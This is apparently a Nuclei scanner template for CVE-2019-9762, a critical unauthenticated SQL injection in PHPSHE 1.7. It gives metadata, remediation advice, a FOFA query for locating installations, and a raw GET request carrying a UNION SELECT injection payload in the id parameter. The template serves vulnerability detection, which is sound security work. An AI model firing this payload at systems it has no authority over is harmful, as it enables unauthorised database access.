Description
A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.
A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.
id: CVE-2019-9762
info:
name: PHPSHE 1.7 - SQL Injection
author: DhiyaneshDK
severity: critical
description: |
A SQL Injection was discovered in PHPSHE 1.7 in include/plugin/payment/alipay/pay.php with the parameter id. The vulnerability does not need any authentication.
impact: |
Attackers can execute arbitrary SQL commands, potentially leading to data theft, modification, or deletion.
remediation: |
Update to the latest version of PHPSHE or apply security patches to sanitize input parameters.
reference:
- https://gitee.com/koyshe/phpshe/issues/ITC0C
- https://nvd.nist.gov/vuln/detail/CVE-2019-9762
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-9762
cwe-id: CWE-89
epss-score: 0.06041
epss-percentile: 0.92993
cpe: cpe:2.3:a:phpshe:phpshe:1.7:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: phpshe
product: phpshe
fofa-query: app="PHPSHE"
tags: cve,cve2019,phpshe,sqli,vkev,vuln
variables:
num: "999999999"
http:
- raw:
- |
GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5({{num}})),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
# digest: 4a0a00473045022002f73db38a01bb48f756c3b5db4ad698d2d91ce69a9b44778cd5582732118f61022100af811e0388818ec9b77fa55abe3454443d9e612f41fd1e5ef070e49b47bd2768:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.